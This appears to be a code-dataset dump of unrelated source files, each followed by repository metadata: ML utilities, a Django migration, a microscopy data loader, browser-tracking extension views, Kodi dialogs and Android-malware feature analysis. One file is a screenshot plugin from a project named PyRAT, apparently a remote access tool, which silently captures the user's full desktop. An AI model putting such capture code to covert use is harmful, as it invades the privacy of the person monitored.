distrib = tfp.distributions.TransformedDistribution(
distribution=tfp.distributions.Uniform(low=0., high=1. - 1e-6),
bijector=tfp.bijectors.Invert(
tfp.bijectors.Weibull(scale=scale, concentration=concentration)))
return distrib.sample(sh)
def sample_ds_maxwell(sh, loc, scale):
return tfd.DoublesidedMaxwell(loc=loc, scale=scale).sample(sh)
| apache-2.0 | 3,290,071,452,825,769,000 | 30.717391 | 77 | 0.733036 | false | 3.53697 | false | false | false |
SnowRomance/CMDB | order/migrations/0002_auto_20161229_1615.py | 1 | 1541 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-12-29 08:15
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('order', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='email',
name='content',
field=models.CharField(max_length=3000, null=True),
),
migrations.AddField(
model_name='email',
name='create_time',
field=models.DateField(default=datetime.datetime(2016, 12, 29, 16, 15, 9, 188000), verbose_name='\u521b\u5efa\u65f6\u95f4'),
),
migrations.AddField(
model_name='email',
name='from_user',
field=models.CharField(max_length=50, null=True),
),
migrations.AddField(
model_name='email',
name='status',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='email',
name='title',
field=models.CharField(max_length=100, null=True),
),
migrations.AddField(
model_name='email',
name='to_user',
field=models.CharField(max_length=100, null=True),
),
migrations.AlterField(
model_name='email',
name='id',
field=models.AutoField(primary_key=True, serialize=False, verbose_name='\u90ae\u4ef6Id'),
),
]
| gpl-3.0 | 2,227,179,580,864,926,000 | 29.215686 | 136 | 0.549643 | false | 4.044619 | false | false | false |
losonczylab/sima | examples/scanbox.py | 3 | 2651 | """Example script to load Scanbox data as a SIMA sequence."""
from __future__ import division
import argparse
import fnmatch
import os
import numpy as np
import sima
from sima import imaging_parameters
def sbxread(path, info_path):
"""Read in an .sbx file and return a SIMA sequence.
Based off of the sbxRead Matlab implementation and
https://scanbox.org/2016/09/02/reading-scanbox-files-in-python/
Parameters
----------
path : str
Path to the Scanbox data file (including the .sbx extension).
info_path : str
Path to the Scanbox info MAT file.
"""
info = imaging_parameters.extract_imaging_parameters(
info_path, format='Scanbox')
nrows = info['recordsPerBuffer']
ncols = info['sz'][1]
nchannels = info['nchannels']
nplanes = info['nplanes']
nframes = (info['max_idx'] + 1) // nplanes
shape = (nchannels, ncols, nrows, nplanes, nframes)
seq = sima.Sequence.create(
'memmap', path=path, shape=shape, dim_order='cxyzt', dtype='uint16',
order='F')
max_uint16_seq = sima.Sequence.create(
'constant', value=np.iinfo('uint16').max, shape=seq.shape)
return max_uint16_seq - seq
def initialize_sbx_datasets(path, calc_time_averages=False):
"""Locate and initialize a SIMA dataset for all Scanbox sbx files."""
for directory, folders, files in os.walk(path):
for sbx_file in fnmatch.filter(files, '*.sbx'):
info_file = os.path.splitext(sbx_file)[0] + '.mat'
sima_dir = os.path.splitext(sbx_file)[0] + '.sima'
if info_file in files and sima_dir not in folders:
print("Initializing SIMA dataset: {}".format(
os.path.join(directory, sima_dir)))
seq = sbxread(
os.path.join(directory, sbx_file),
os.path.join(directory, info_file))
dset = sima.ImagingDataset(
[seq], savedir=os.path.join(directory, sima_dir))
if calc_time_averages:
print("Calculating time averages: {}".format(
os.path.join(directory, sima_dir)))
dset.time_averages
if __name__ == '__main__':
argParser = argparse.ArgumentParser()
argParser.add_argument(
"-t", "--time_averages", action="store_true",
help="Pre-calc time averages.")
argParser.add_argument(
"path", action="store", type=str, default=os.curdir,
help="Locate all Scanbox files below this path.")
args = argParser.parse_args()
initialize_sbx_datasets(args.path, args.time_averages)
| gpl-2.0 | -7,431,469,433,316,229,000 | 32.556962 | 76 | 0.60845 | false | 3.58728 | false | false | false |
martin882003/PyRAT | plugins/screenshot.py | 1 | 1230 | #!/usr/bin/env python
#-*- encoding:utf-8 -*-
# screenshot.py
from PyQt4.QtGui import QApplication, QPixmap
from os import environ, mkdir, listdir
from sys import argv, platform
from time import strftime, gmtime
class Screenshot(object):
def __init__(self):
if platform == 'win32':
self.usuario = environ['USERNAME']
else:
self.usuario = environ['USER']
if not 'screenshot' in listdir('./'):
mkdir('screenshot')
def capturarPantalla(self):
time = strftime("%d %b %Y_%H:%M:%S", gmtime())
imagen = './screenshot/' + self.usuario + '_' + time + '.png'
app = QApplication(argv)
winId = QApplication.desktop().winId()
width = QApplication.desktop().screenGeometry().width()
height = QApplication.desktop().screenGeometry().height()
captura = QPixmap.grabWindow(winId, 0, 0, width, height)
captura.save(imagen)
def main():
ss = Screenshot()
ss.capturarPantalla()
if __name__ == '__main__':
main()
| gpl-2.0 | -3,672,721,533,335,851,500 | 30.538462 | 77 | 0.509756 | false | 4.300699 | false | false | false |
haystack/eyebrowse-server | extension/views.py | 1 | 12847 | import datetime
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from django.db.models.aggregates import Sum
from django.db.models import Q
from django.shortcuts import get_object_or_404
from django.views.decorators.clickjacking import xframe_options_exempt
from django.views.decorators.csrf import csrf_exempt
from django.utils import timezone
from django.views.generic.simple import redirect_to
from annoying.decorators import ajax_request
from annoying.decorators import render_to
from accounts.models import UserProfile
from api.models import ChatMessage, MuteList
from api.models import EyeHistory
from api.models import EyeHistoryMessage
from api.models import Page
from api.models import Domain
from api.models import Ratings
from api.utils import humanize_time
from tags.models import Tag
from common.view_helpers import JSONResponse
from common.templatetags.gravatar import gravatar_for_user
from common.templatetags.filters import url_domain
from api.views import rating_get
from eyebrowse.settings import BASE_URL
import re
twitter_username_re = re.compile(r'@([A-Za-z0-9_]+)')
def logged_in(request):
if request.user.is_authenticated():
return JSONResponse({'res': True,
'username': request.user.username})
else:
return JSONResponse({'res': False})
@login_required
def ticker_info(request):
timestamp = timezone.now() - datetime.timedelta(minutes=5)
followers = User.objects.filter(userprofile__followed_by=request.user)
history = EyeHistory.objects.filter(
start_time__gt=timestamp).order_by('-start_time').select_related()
most_recent_hist = None
mutelist_urls = MuteList.objects.filter(
user=request.user,
url__isnull=False
).values_list('url', flat=True)
mutelist_words = MuteList.objects.filter(
user=request.user, word__isnull=False
).values_list('word', flat=True)
users = []
for h in history:
if h.user not in users and h.user in followers:
if most_recent_hist == None:
show = True
if len(mutelist_urls) > 0:
for m in mutelist_urls:
if m in h.url:
show = False
if show and len(mutelist_words) > 0:
for m in mutelist_words:
if m in h.title:
show = False
if show:
most_recent_hist = h
users.append({ 'username': h.user.username,
'pic_url': gravatar_for_user(h.user),
'url': '%s/users/%s' % (BASE_URL, h.user.username),
})
res = {}
res['online_users'] = sorted(users, key=lambda u: u['username'])
if most_recent_hist != None:
res['history_item'] = { 'username': most_recent_hist.user.username,
'pic_url': gravatar_for_user(most_recent_hist.user),
'user_url': '%s/users/%s' % (BASE_URL, most_recent_hist.user.username),
'url': most_recent_hist.url,
'title': most_recent_hist.title,
'favicon': most_recent_hist.favIconUrl,
'time_ago': humanize_time(timezone.now() - most_recent_hist.start_time)
}
t = Tag.objects.filter(user=request.user, domain=most_recent_hist.domain)
if t.exists():
res['history_item']['tag'] = {'name': t[0].name,
'color': t[0].color}
else:
res['history_item'] = None
return JSONResponse(res)
@csrf_exempt
@login_required
def bubble_info(request):
url = request.POST.get('url', '')
domain = url_domain(url)
timestamp = timezone.now() - datetime.timedelta(days=7)
used_users = []
active = []
followers = User.objects.filter(userprofile__followed_by=request.user)
eyehists = EyeHistory.objects.filter((
Q(url=url) | Q(domain=domain)) &
Q(start_time__gt=timestamp) &
~Q(user_id=request.user.id)
).order_by('-end_time').select_related()
for eyehist in eyehists:
if len(active) >= 6:
break
user = eyehist.user
if user not in used_users and user in followers:
old_level = 3
if eyehist.end_time > \
(timezone.now() - datetime.timedelta(minutes=5)):
old_level = 0
elif eyehist.end_time > \
(timezone.now() - datetime.timedelta(hours=1)):
old_level = 1
elif eyehist.end_time > \
(timezone.now() - datetime.timedelta(hours=24)):
old_level = 2
url_level = "site-level"
if eyehist.url == url:
url_level = "page-level"
active.append({'username': user.username,
'pic_url': gravatar_for_user(user),
'url': '%s/users/%s' % (BASE_URL, user.username),
'old_level': old_level,
'url_level': url_level,
'time_ago': humanize_time(
timezone.now() - eyehist.end_time)
})
used_users.append(user)
messages = EyeHistoryMessage.objects.filter(
Q(eyehistory__url=url) &
Q(post_time__gt=timestamp)
).order_by('-post_time').select_related()
about_message = None
user_url = None
username = None
message = None
for m in messages:
if m.eyehistory.user in followers:
message = m.message
about_message = humanize_time(
timezone.now() - m.post_time) + ' ago'
user_url = '%s/users/%s' % (BASE_URL, m.eyehistory.user.username)
username = m.eyehistory.user.username
break
if not about_message:
chat_messages = ChatMessage.objects.filter(
url=url).order_by('-date').select_related()
for c in chat_messages:
if c.author in followers:
about_message = humanize_time(timezone.now() - c.date) + ' ago'
message = '"%s"' % (c.message)
user_url = '%s/users/%s' % (BASE_URL, c.author.username)
username = c.author.username
break
if not about_message:
about_message = ''
message = ''
return JSONResponse({
'url': url,
'active_users': active,
'message': message,
'about_message': about_message,
'user_url': user_url,
'username': username,
})
@ajax_request
def profilepic(request):
url = gravatar_for_user(request.user)
url = 'https://%s' % url[7:]
return redirect_to(request, url)
@login_required
@ajax_request
def get_friends(request):
query = request.GET.get('query', None).lower()
user_prof = UserProfile.objects.get(user=request.user)
friends = user_prof.follows.all()
data = []
for friend in friends:
if not query or query in friend.user.username.lower():
data.append({'id': friend.id,
'name': '@%s' % (friend.user.username),
'avatar': gravatar_for_user(friend.user),
'type': 'contact'})
if len(data) > 5:
break
return {'res': data}
@login_required
@ajax_request
def get_messages(request):
url = request.GET.get('url', '')
messages = EyeHistoryMessage.objects.filter(eyehistory__url=url).order_by('-post_time').select_related()
message_list = []
for message in messages:
eye_hist = message.eyehistory
m = twitter_username_re.sub(lambda m: '<a href="http://eyebrowse.csail.mit.edu/users/%s">%s</a>' % (m.group(1), m.group(0)), message.message)
message_list.append({'message': m,
'post_time': str(message.post_time),
'username': eye_hist.user.username,
'pic_url': gravatar_for_user(eye_hist.user),
'user_url': '%s/users/%s' % (BASE_URL, eye_hist.user.username),
'hum_time': humanize_time(
timezone.now() - message.post_time) + ' ago'
})
return {
'result': {
'messages': message_list,
}
}
@login_required
@ajax_request
def active(request):
url = request.GET.get('url', '')
domain = url_domain(url)
timestamp = timezone.now() - datetime.timedelta(days=7)
used_users = []
active_users = []
active_dusers = []
eyehists = EyeHistory.objects.filter(
(Q(url=url) | Q(domain=domain)) &
Q(start_time__gt=timestamp) &
~Q(user_id=request.user.id)
).order_by('-end_time').select_related()
for eyehist in eyehists:
if len(used_users) >= 6:
break
user = eyehist.user
if user not in used_users:
old_level = 3
if eyehist.end_time > \
(timezone.now() - datetime.timedelta(minutes=5)):
old_level = 0
elif eyehist.end_time > \
(timezone.now() - datetime.timedelta(hours=1)):
old_level = 1
elif eyehist.end_time > \
(timezone.now() - datetime.timedelta(hours=24)):
old_level = 2
if url == eyehist.url:
active_users.append({'username': user.username,
'pic_url': gravatar_for_user(user),
'resourceURI': '%s/users/%s' % (BASE_URL, user.username),
'old_level': old_level,
'time_ago': humanize_time(
timezone.now() - eyehist.end_time)
})
else:
active_dusers.append({'username': user.username,
'pic_url': gravatar_for_user(user),
'resourceURI': '%s/users/%s' % (BASE_URL, user.username),
'old_level': old_level,
'time_ago': humanize_time(
timezone.now() - eyehist.end_time)
})
used_users.append(user)
return {
'result': {
'page': active_users,
'domain': active_dusers
}
}
def get_stats(visits):
count = visits.count()
if count == 1:
count_text = '1 visit'
else:
count_text = '%s visits' % (count)
if count == 0:
time = '0 seconds'
else:
avg_time = float(visits.aggregate(Sum('total_time'))['total_time__sum'])/float(count)
time = humanize_time(datetime.timedelta(
milliseconds=avg_time))
time = re.sub('minutes', 'min', time)
time = re.sub('minute', 'min', time)
return count_text, time
@login_required
@ajax_request
def stats(request):
url = request.GET.get('url', '')
my_user = get_object_or_404(User, username=request.user.username)
my_visits = EyeHistory.objects.filter(user=my_user, url=url)
my_count, my_time = get_stats(my_visits)
total_visits = EyeHistory.objects.filter(url=url)
total_count, total_time = get_stats(total_visits)
domain = url_domain(url)
my_dvisits = EyeHistory.objects.filter(user=my_user, domain=domain)
my_dcount, my_dtime = get_stats(my_dvisits)
total_dvisits = EyeHistory.objects.filter(domain=domain)
total_dcount, total_dtime = get_stats(total_dvisits)
domain,_ = Domain.objects.get_or_create(url=domain)
page,_ = Page.objects.get_or_create(url=url,domain=domain)
domain_score = domain.agg_score
score = 0
error = "Success"
try:
rating = Ratings.objects.get(user=my_user,page=page)
score = rating.score
except Ratings.DoesNotExist:
error = "Failure: Rating does not exist"
res = {'my_count': my_count,
'my_time': my_time,
'total_count': total_count,
'total_time': total_time,
'my_dcount': my_dcount,
'my_dtime': my_dtime,
'total_dcount': total_dcount,
'total_dtime': total_dtime,
'score': score,
'domain_score': domain_score
}
return {
'result': res
}
| mit | -8,257,733,362,844,671,000 | 32.110825 | 149 | 0.535378 | false | 3.888317 | false | false | false |
openai/baselines | baselines/common/vec_env/vec_env.py | 1 | 6195 | import contextlib
import os
from abc import ABC, abstractmethod
from baselines.common.tile_images import tile_images
class AlreadySteppingError(Exception):
"""
Raised when an asynchronous step is running while
step_async() is called again.
"""
def __init__(self):
msg = 'already running an async step'
Exception.__init__(self, msg)
class NotSteppingError(Exception):
"""
Raised when an asynchronous step is not running but
step_wait() is called.
"""
def __init__(self):
msg = 'not running an async step'
Exception.__init__(self, msg)
class VecEnv(ABC):
"""
An abstract asynchronous, vectorized environment.
Used to batch data from multiple copies of an environment, so that
each observation becomes an batch of observations, and expected action is a batch of actions to
be applied per-environment.
"""
closed = False
viewer = None
metadata = {
'render.modes': ['human', 'rgb_array']
}
def __init__(self, num_envs, observation_space, action_space):
self.num_envs = num_envs
self.observation_space = observation_space
self.action_space = action_space
@abstractmethod
def reset(self):
"""
Reset all the environments and return an array of
observations, or a dict of observation arrays.
If step_async is still doing work, that work will
be cancelled and step_wait() should not be called
until step_async() is invoked again.
"""
pass
@abstractmethod
def step_async(self, actions):
"""
Tell all the environments to start taking a step
with the given actions.
Call step_wait() to get the results of the step.
You should not call this if a step_async run is
already pending.
"""
pass
@abstractmethod
def step_wait(self):
"""
Wait for the step taken with step_async().
Returns (obs, rews, dones, infos):
- obs: an array of observations, or a dict of
arrays of observations.
- rews: an array of rewards
- dones: an array of "episode done" booleans
- infos: a sequence of info objects
"""
pass
def close_extras(self):
"""
Clean up the extra resources, beyond what's in this base class.
Only runs when not self.closed.
"""
pass
def close(self):
if self.closed:
return
if self.viewer is not None:
self.viewer.close()
self.close_extras()
self.closed = True
def step(self, actions):
"""
Step the environments synchronously.
This is available for backwards compatibility.
"""
self.step_async(actions)
return self.step_wait()
def render(self, mode='human'):
imgs = self.get_images()
bigimg = tile_images(imgs)
if mode == 'human':
self.get_viewer().imshow(bigimg)
return self.get_viewer().isopen
elif mode == 'rgb_array':
return bigimg
else:
raise NotImplementedError
def get_images(self):
"""
Return RGB images from each environment
"""
raise NotImplementedError
@property
def unwrapped(self):
if isinstance(self, VecEnvWrapper):
return self.venv.unwrapped
else:
return self
def get_viewer(self):
if self.viewer is None:
from gym.envs.classic_control import rendering
self.viewer = rendering.SimpleImageViewer()
return self.viewer
class VecEnvWrapper(VecEnv):
"""
An environment wrapper that applies to an entire batch
of environments at once.
"""
def __init__(self, venv, observation_space=None, action_space=None):
self.venv = venv
super().__init__(num_envs=venv.num_envs,
observation_space=observation_space or venv.observation_space,
action_space=action_space or venv.action_space)
def step_async(self, actions):
self.venv.step_async(actions)
@abstractmethod
def reset(self):
pass
@abstractmethod
def step_wait(self):
pass
def close(self):
return self.venv.close()
def render(self, mode='human'):
return self.venv.render(mode=mode)
def get_images(self):
return self.venv.get_images()
def __getattr__(self, name):
if name.startswith('_'):
raise AttributeError("attempted to get missing private attribute '{}'".format(name))
return getattr(self.venv, name)
class VecEnvObservationWrapper(VecEnvWrapper):
@abstractmethod
def process(self, obs):
pass
def reset(self):
obs = self.venv.reset()
return self.process(obs)
def step_wait(self):
obs, rews, dones, infos = self.venv.step_wait()
return self.process(obs), rews, dones, infos
class CloudpickleWrapper(object):
"""
Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle)
"""
def __init__(self, x):
self.x = x
def __getstate__(self):
import cloudpickle
return cloudpickle.dumps(self.x)
def __setstate__(self, ob):
import pickle
self.x = pickle.loads(ob)
@contextlib.contextmanager
def clear_mpi_env_vars():
"""
from mpi4py import MPI will call MPI_Init by default. If the child process has MPI environment variables, MPI will think that the child process is an MPI process just like the parent and do bad things such as hang.
This context manager is a hacky way to clear those environment variables temporarily such as when we are starting multiprocessing
Processes.
"""
removed_environment = {}
for k, v in list(os.environ.items()):
for prefix in ['OMPI_', 'PMI_']:
if k.startswith(prefix):
removed_environment[k] = v
del os.environ[k]
try:
yield
finally:
os.environ.update(removed_environment)
| mit | 827,595,282,135,824,100 | 26.780269 | 219 | 0.606295 | false | 4.387394 | false | false | false |
sangwook236/SWDT | sw_dev/python/ext/test/database/leveldb_main.py | 1 | 3320 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
import json
import numpy as np
#import caffe
import leveldb
def write_to_db_example(use_caffe_datum=False):
N = 1000
X = np.zeros((N, 3, 32, 32), dtype=np.uint8)
y = np.zeros(N, dtype=np.int64)
leveldb_dir_path = './myleveldb'
db = leveldb.LevelDB(leveldb_dir_path, create_if_missing=True)
if use_caffe_datum:
#import caffe
import caffe_pb2
for i in range(N):
# REF [site] >> https://github.com/BVLC/caffe/blob/master/src/caffe/proto/caffe.proto
#datum = caffe.proto.caffe_pb2.Datum()
datum = caffe_pb2.Datum()
datum.channels = X.shape[1]
datum.height = X.shape[2]
datum.width = X.shape[3]
datum.data = X[i].tobytes() # or .tostring() if numpy < 1.9.
datum.label = int(y[i])
str_id = '{:08}'.format(i)
# The encode is only essential in Python 3.
db.Put(str_id.encode('ascii'), datum.SerializeToString())
else:
for i in range(N):
datum = {
'channels': X.shape[1],
'height': X.shape[2],
'width': X.shape[3],
'data': X[i].tolist(),
'label': int(y[i]),
}
str_id = '{:08}'.format(i)
# The encode is only essential in Python 3.
db.Put(str_id.encode('ascii'), json.dumps(datum).encode('ascii'))
#db.Delete(b'00000000')
#--------------------
print(db.GetStats())
def read_from_db_example(use_caffe_datum=False):
leveldb_dir_path = './myleveldb'
db = leveldb.LevelDB(leveldb_dir_path, create_if_missing=True)
key = b'00000000'
try:
raw_datum = db.Get(key)
except KeyError as ex:
print('Invalid key, {}.'.format(key))
return
if use_caffe_datum:
#import caffe
import caffe_pb2
# REF [site] >> https://github.com/BVLC/caffe/blob/master/src/caffe/proto/caffe.proto
#datum = caffe.proto.caffe_pb2.Datum()
datum = caffe_pb2.Datum()
datum.ParseFromString(raw_datum)
x = np.fromstring(datum.data, dtype=np.uint8)
x = x.reshape(datum.channels, datum.height, datum.width)
y = datum.label
else:
datum = json.loads(raw_datum.decode('ascii'))
x = np.array(datum['data'], dtype=np.uint8)
x = x.reshape(datum['channels'], datum['height'], datum['width'])
y = datum['label']
print(x.shape, y)
def key_value_example(use_caffe_datum=False):
leveldb_dir_path = './myleveldb'
db = leveldb.LevelDB(leveldb_dir_path, create_if_missing=True)
if use_caffe_datum:
#import caffe
import caffe_pb2
for k, v in db.RangeIter():
# REF [site] >> https://github.com/BVLC/caffe/blob/master/src/caffe/proto/caffe.proto
#datum = caffe.proto.caffe_pb2.Datum()
datum = caffe_pb2.Datum()
datum.ParseFromString(v)
x = np.fromstring(datum.data, dtype=np.uint8)
x = x.reshape(datum.channels, datum.height, datum.width)
y = datum.label
print(k.decode(), x.shape, y)
else:
for k, v in db.RangeIter():
datum = json.loads(v.decode('ascii'))
x = np.array(datum['data'], dtype=np.uint8)
x = x.reshape(datum['channels'], datum['height'], datum['width'])
y = datum['label']
print(k.decode(), x.shape, y)
def main():
# Usage:
# For using Caffe Datum:
# protoc --python_out=. caffe.proto
use_caffe_datum = False
write_to_db_example(use_caffe_datum)
#read_from_db_example(use_caffe_datum)
#key_value_example(use_caffe_datum)
#--------------------------------------------------------------------
if '__main__' == __name__:
main()
| gpl-3.0 | -4,361,505,926,520,029,700 | 26.666667 | 88 | 0.636747 | false | 2.620363 | false | false | false |
dannyperry571/theapprentice | script.module.nanscrapers/lib/nanscrapers/dialogs.py | 1 | 7998 | from threading import Thread, RLock
import xbmc
import xbmcaddon
import xbmcgui
def select_ext(title, populator, tasks_count, sort_function = None):
addonPath = xbmcaddon.Addon().getAddonInfo('path').decode('utf-8')
dlg = SelectorDialog("DialogSelect.xml", addonPath, title=title,
populator=populator, steps=tasks_count, sort_function=sort_function)
with ExtendedDialogHacks():
dlg.doModal()
selection = dlg.get_selection()
del dlg
return selection
class FanArtWindow(xbmcgui.WindowDialog):
def __init__(self):
control_background = xbmcgui.ControlImage(0, 0, 1280, 720, xbmcaddon.Addon().getAddonInfo('fanart'))
self.addControl(control_background)
fanart = xbmc.getInfoLabel('ListItem.Property(Fanart_Image)')
if fanart and fanart != "Fanart_Image":
control_fanart = xbmcgui.ControlImage(0, 0, 1280, 720, fanart)
self.addControl(control_fanart)
class ExtendedDialogHacks(object):
def __init__(self):
self.active = False
self.hide_progress = False
self.hide_info = False
self.autohidedialogs = False
if self.autohidedialogs:
self.hide_progress = False
self.hide_info = False
if not self.hide_progress and not self.hide_info:
self.autohidedialogs = False
def __enter__(self):
self.active = True
# self.numeric_keyboard = None
self.fanart_window = FanArtWindow()
## Keyboard hack
# if plugin.get_setting(SETTING_ADVANCED_KEYBOARD_HACKS, converter=bool):
# self.numeric_keyboard = xbmcgui.Window(10109)
# Thread(target = lambda: self.numeric_keyboard.show()).start()
# wait_for_dialog('numericinput', interval=50)
# Show fanart background
self.fanart_window.show()
# Run background task
if self.autohidedialogs:
Thread(target=self.background_task).start()
def background_task(self):
xbmc.sleep(1000)
while not xbmc.abortRequested and self.active:
if self.hide_progress:
active_window = xbmcgui.getCurrentWindowDialogId()
if active_window in [10101, 10151]:
xbmc.executebuiltin("Dialog.Close(%d, true)" % active_window)
if self.hide_info:
if xbmc.getCondVisibility("Window.IsActive(infodialog)"):
xbmc.executebuiltin('Dialog.Close(infodialog, true)')
xbmc.sleep(100)
def __exit__(self, exc_type, exc_value, traceback):
self.active = False
# if self.numeric_keyboard is not None:
# self.numeric_keyboard.close()
# del self.numeric_keyboard
# xbmc.executebuiltin("Dialog.Close(numericinput, true)")
self.fanart_window.close()
del self.fanart_window
class SelectorDialog(xbmcgui.WindowXMLDialog):
def __init__(self, *args, **kwargs):
xbmcgui.WindowXMLDialog.__init__(self)
self.title = kwargs['title']
self.populator = kwargs['populator']
self.steps = kwargs['steps']
self.sort_function = kwargs['sort_function']
self.items = []
self.selection = None
self.insideIndex = -1
self.completed_steps = 0
self.thread = None
self.lock = RLock()
def get_selection(self):
""" get final selection """
return self.selection
def onInit(self):
# set title
self.label = self.getControl(1)
self.label.setLabel(self.title)
# Hide ok button
self.getControl(5).setVisible(False)
# Get active list
try:
self.list = self.getControl(6)
self.list.controlLeft(self.list)
self.list.controlRight(self.list)
self.getControl(3).setVisible(False)
except:
self.list = self.getControl(3)
self.setFocus(self.list)
# populate list
self.thread = Thread(target=self._populate)
self.thread.start()
def onAction(self, action):
if action.getId() in (9, 10, 92, 216, 247, 257, 275, 61467, 61448,):
if self.insideIndex == -1:
self.close()
else:
self._inside_root(select=self.insideIndex)
def onClick(self, controlID):
if controlID == 6 or controlID == 3:
num = self.list.getSelectedPosition()
if num >= 0:
if self.insideIndex == -1:
self._inside(num)
else:
self.selection = self.items[self.insideIndex][1][num]
self.close()
def onFocus(self, controlID):
if controlID in (3, 61):
self.setFocus(self.list)
def _inside_root(self, select=-1):
with self.lock:
self.list.reset()
for source, links in self.items:
if len(links) > 1:
source += " >>"
listitem = xbmcgui.ListItem(source)
try:
icon = xbmcaddon.Addon(id=links[0]['path'].split("/")[2]).getAddonInfo('icon')
listitem.setIconImage(icon)
except:
pass
self.list.addItem(listitem)
if select >= 0:
self.list.selectItem(select)
self.insideIndex = -1
def _inside(self, num):
if num == -1:
self._inside_root(select=self.insideIndex)
return
with self.lock:
source, links = self.items[num]
if len(links) == 1:
self.selection = links[0]
self.close()
return
self.list.reset()
for item in links:
listitem = xbmcgui.ListItem(item['label'])
listitem.setProperty("Path", item['path'])
try:
pluginid = item['path'].split("/")[2]
icon = xbmcaddon.Addon(id=pluginid).getAddonInfo('icon')
listitem.setIconImage(icon)
except:
pass
self.list.addItem(listitem)
self.insideIndex = num
def step(self):
self.completed_steps += 1
progress = self.completed_steps * 100 / self.steps
self.label.setLabel(u"{0} - {1:d}% ({2}/{3})".format(self.title, progress,
self.completed_steps, self.steps))
def _populate(self):
xbmc.sleep(500) # Delay population to let ui settle
self.label.setLabel(self.title)
for result in self.populator():
self.step()
if not result:
continue
with self.lock:
# Remember selected item
selectedItem = None
if self.insideIndex == -1:
selectedIndex = self.list.getSelectedPosition()
else:
selectedIndex = self.insideIndex
if selectedIndex >= 0:
selectedItem = self.items[selectedIndex]
# Add new item
self.items.extend(result)
if self.sort_function:
self.items = sorted(self.items, key = self.sort_function)
#self.items.sort()
# Retrived new selection-index
if selectedItem is not None:
selectedIndex = self.items.index(selectedItem)
if self.insideIndex != -1:
self.insideIndex = selectedIndex
# Update only if in root
if self.insideIndex == -1:
self._inside_root(select=selectedIndex)
self.setFocus(self.list)
pass
| gpl-2.0 | -3,316,285,077,037,326,300 | 31.91358 | 108 | 0.53801 | false | 4.304629 | false | false | false |
hgascon/adagio | adagio/core/featureAnalysis.py | 1 | 6579 | #!/usr/bin/python
# ADAGIO Android Application Graph-based Classification
# featureAnalysis.py >> Analysis of features from SVM linear model
# Copyright (c) 2016 Hugo Gascon <[email protected]>
import os
import numpy as np
import networkx as nx
from random import shuffle
from adagio.common import ml
"""
Example:
import featureAnalysis as fa
w_binary = clf.best_estimator_.coef_[0]
w_agg = fa.aggregate_binary_svm_weights(w, 13)
"""
def print_largest_weights(w_agg, n):
""" Print the largest weights
"""
idx = w_agg.argsort()[::-1][:n]
w_agg_highest = w_agg[idx]
labels = [np.binary_repr(i, 15) for i in idx]
print(zip(w_agg_highest, labels))
def aggregate_binary_svm_weights(w_binary, expansion_bits):
""" Return the aggregated version of the SVM weight vector considering
the binary representation length of the original non-binary feature.
Args:
w_binary: an array of SVM weights related to binary features.
expansion_bits: the number of bits used to represent each feature in
the original feature vector.
Returns:
w: the aggregated version of the SVM weight vector
"""
feature_idx = len(w_binary) / expansion_bits # should be a int
w = np.array([sum(w_binary[expansion_bits * i:expansion_bits * (i + 1)])
for i in range(feature_idx)])
return w
def compute_neighborhoods_per_weights(d, w, n_weights, n_files=300):
""" Write report with info about highed ranked neighborhoods in a samples
according to the weights learnt by the linear SVM model.
Args:
d: directory of the files to be processed
w: linear SVM weights
n_weights: number of weights to analyze
n_files: number of files to process from directory d
Returns:
Outputs the file feature_analysis.txt
"""
files = read_files(d, "fcgnx", n_files)
sorted_weights_idx = w.argsort()[::-1]
f_out = "feature_analysis.txt".format(n_weights)
print("[*] Writing file {0}...".format(f_out))
fd = open(f_out, 'wb')
# fd.write("Total number of weights in SVM model: {0}\n".format(len(w)))
# fd.write("Selected number of highest weights per sample: {0}\n".format(n_weights))
for f in files:
fn = os.path.join(d, f)
neighborhoods, n_nodes = get_high_ranked_neighborhoods(fn, w,
sorted_weights_idx,
n_weights)
try:
if neighborhoods:
fd.write("\n\n#########################################\n\n")
fd.write(os.path.basename(f)+"\n\n")
fd.write("nodes: {0}\n\n".format(n_nodes))
fd.write("\n".join(neighborhoods))
except:
pass
fd.close()
print("[*] File written.")
def get_high_ranked_neighborhoods(fcgnx_file, w, sorted_weights_idx,
show_small=False, weights=1):
# g = FCGextractor.build_cfgnx(fcgnx_file)
g = nx.read_gpickle(fcgnx_file)
g_hash = ml.neighborhood_hash(g)
neighborhoods = []
remaining_weights = weights
for idx in sorted_weights_idx:
if remaining_weights > 0:
label_bin = np.binary_repr(idx, 15)
label = np.array([int(i) for i in label_bin])
matching_neighborhoods = []
for m, nh in g_hash.node.iteritems():
if np.array_equal(nh["label"], label):
neighbors_l = g_hash.neighbors(m)
if neighbors_l:
neighbors = '\n'.join([str(i) for i in neighbors_l])
matching_neighborhoods.append("{0}\n{1}\n{2}\n".format(w[idx],
m, neighbors))
else:
if show_small:
matching_neighborhoods.append("{0}\n{1}\n".format(w[idx], m))
if matching_neighborhoods:
remaining_weights -= 1
neighborhoods += matching_neighborhoods
else:
n_nodes = g_hash.number_of_nodes()
del g
del g_hash
return neighborhoods, n_nodes
def add_weights_to_nodes(g, w, show_labels=True):
g_hash = ml.neighborhood_hash(g)
# initialize the weight for every node in g_hash
for n, nh in g_hash.node.iteritems():
idx = int("".join([str(i) for i in nh["label"]]), 2)
w_nh = w[idx]
g_hash.node[n]["label"] = w_nh
# create a copy of the weighted graph
g_hash_weighted = g_hash.copy()
# aggregate the weights of each node with the
# original weight of its caller
for n, nh in g_hash.node.iteritems():
for neighbor in g_hash.neighbors(n):
g_hash_weighted.node[neighbor]["label"] += g_hash.node[n]["label"]
# create array of the node weigths
g_weights = []
for n, nh in g_hash_weighted.node.iteritems():
g_weights.append(nh["label"])
# normalize weight between 0.5 and 1 to plot
g_weights = np.array(g_weights)
g_weights.sort()
g_weights_norm = normalize_weights(g_weights)
g_weights_norm = g_weights_norm[::-1]
d_w_norm = dict(zip(g_weights, g_weights_norm))
# add normalized weight as color to each node
for n, nh in g_hash_weighted.node.iteritems():
w = g_hash_weighted.node[n]["label"]
g_hash_weighted.node[n]["style"] = "filled"
g_hash_weighted.node[n]["fillcolor"] = "0.000 0.000 {0}".format(d_w_norm[w])
# write function name in the label of the node or remove label
if show_labels:
